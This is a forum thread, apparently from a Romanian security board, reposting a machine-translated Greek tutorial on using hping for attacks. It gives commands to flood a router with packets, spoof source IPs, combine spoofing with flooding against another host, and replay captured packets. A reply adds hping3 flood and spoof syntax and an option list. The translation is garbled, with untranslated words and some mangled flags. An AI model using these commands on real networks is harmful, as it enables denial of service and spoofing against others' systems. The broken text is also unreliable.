Jump to content
CrashOverline

[linux] Hping tutorial

Recommended Posts

There are many tools for testing if a network does not mince attacks such as DoS, sniffing, spoofing clips, and a significant help admin to make the network more secure as it can. At the same time these tools can be a nightmare for an admin who has not taken the steps paraitita. That in a nutshell can be used for good purposes can, however chrisimopoithoun and bad. It depends on what side we are and what we want. In this article we will take the hand of the aggressor and chrisi9mopoiisoume a very powerful tool hping. For those who do not know what makes this tool I refer you here:

 http://en.wikipedia.org/wiki/Hping 

First you should download (if you have naturally) in hping from here:

http://www.hping.org/download.php 

After you install on your system, you will go to either terminal (linux / unix), or the Command prompt (cmd) for Windows.

The tutorial will be linux fedora course there is no difference between systimatos in this tool.

To see what parameters dechete about this tool is sufficient to typed hping - help, and will take us

all parameters and what each one. Certainly not here to analyze all but you can peiramatistite.

The following are some (not-so-innocent) uses of this tool.

DoS:

The fear and terror of an admin is not to drop your network that do not accept a DoS attack even from within the network. With this tool we kalista causing a DoS kapoioa network device making it impossible to serve the network. Suppose we want to attack a router network

be typed the following command.

 hping - flood 192.168.2.1 

The format is very simple. Just tell hping to send packets to the router constantly in my case 192.168.2.1

CAUTION: If you are connected to the internet connection will be dropped but do not worry it epanelei.

We can add other parameters depending on what we do.

Eg We can change how many hops the TTL to be done to reach its destination (Time to live - Wikipedia, the free encyclopedia), exactly how many packages will send clips.

 hping - flood - ttl 2 - count 100 192.168.2.1 

In the above command just hping commands to send 100 packages to flood mode with ttl 2 to router 192.168.2.1

Of course, of course there are other parameters that you can find them if you typed hping - help

Simple ip spoofing

On to hping can execute and ip spoofing attacks. You will perform a simple ip spoofing attack. (There is a blind ip spoofing but wants a lot of time and patience)

Dialdi to send a package from us ip (192.168.2.29), the router (192.168.2.1) having to change source ip from 192.168.2.29 to any one we like 192.168.2.100

To execute ip spoofing attacks again the syntax is quite easy:

  hping - spoof [fake source address] [destination address] 

That is, if we want to make the example given above is sufficient to "give" the following command:

hping - spoof 192.168.2.100 192.168.2.1 

aaatty.png

And the results in WireShark.

2mw6ogj.png

As we have seen a single ip spoofing ....

Ip spoofing & DoS mixed:

Now we will attack ip spoofing & DoS taftochtona. That will make DoS another pc on the network with spoofed ip address (we will put ip address as the address of the router), so the pc will do flood to think that the requests come from the router so that steleni responses resulting have the same effect as described on poti case.

Anlaftikotera ..

hping - flood - spoof 192.168.2.1 - ttl 2 192.168.2.34 

Let me explain ....

We normally flood as in the first case with a false ip (router ip), in order the pc to think that the requests come from the router and the answering plimyrizontas with packages making it impossible to service the network ...

Sending custom packets:

hping boryme the course and send our packages. What I mean. Do we capture a packet file from wireshark for example, and then to give the course and hping to send it as a spoofed address. What detail:

 hping - spoof 192.168.2.100-d 100-E testfile 192.168.2.1 

Let me explain ..

The unknown parameter - spoof set the fake address. The-d is the packet size. How is the packet size,-R is the record of the captured packets in, and 192.168.2.1 is the goal.

The package I have done to capture WireShark and a simple packet icmp echo request (The packet is sent when a computer makes ping).

And here is the result of this mandate in WireShark ....

5o70cx.png

And of course you can dyndyazetai parameters as well and others have failed, moreover, for this is both possible tool.

=======================================

Tin sa precizez ca tutorialul a fost tradus cu google trans. din limba greaca in cea engleza.

Sper sa intelegeti...:)

Il traduceam direct in romana dar se intelege mai bine in engleza ;)

Link to comment
Share on other sites

Hping3 suporta optiunea --flood iar syntax-ul e

hping3  --flood 192.168.0.1

Va trimite pachete in mod continuu si repede

Spoofing in Hping3

hping3    --spoof 192.168.0.2 --icmp-ts 192.168.0.1 

Pot fi specificate si anumite pachete , in acest caz am specificat un ICMP timestamp request

Dar pot fi si altele

ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you'll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime

Este un tool destul de tare pt a efectua diverse lucruri ,dar va trebui folosit si un sniffer ca sa analizati pachetele trimise si raspunsurile primite

Este un scanner folosit pt servere care folosesc Firewall,sau IDS pt a analiza comportamentul a acestora .

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...